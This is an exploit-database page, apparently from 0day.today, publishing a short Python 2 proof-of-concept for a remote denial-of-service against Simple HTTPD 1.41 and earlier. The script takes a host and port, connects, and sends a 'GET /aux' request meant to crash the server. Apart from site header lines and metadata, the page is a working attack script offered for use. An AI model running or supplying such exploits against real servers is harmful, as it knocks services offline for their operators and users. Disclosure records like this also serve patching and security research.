[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit

Author
shinnai
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6477
Category
dos / poc
Date add
11-12-2007
Platform
unsorted
============================================================
Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit
============================================================





#usage: poc.py host port

import socket
import sys

print "-----------------------------------------------------------------------"
print "Simple HTTPD 1.3 /aux Denial of Service\n"
print "url: http://shttpd.sourceforge.net\n"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "-----------------------------------------------------------------------"

host = sys.argv[1]
port = long(sys.argv[2])

try:
   request =  "GET /aux HTTP/1.1\n\n"
   connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   connection.connect((host, port))
   connection.send(request)
except:
   print "Unable to connect. exiting."




#  0day.today [2024-11-15]  #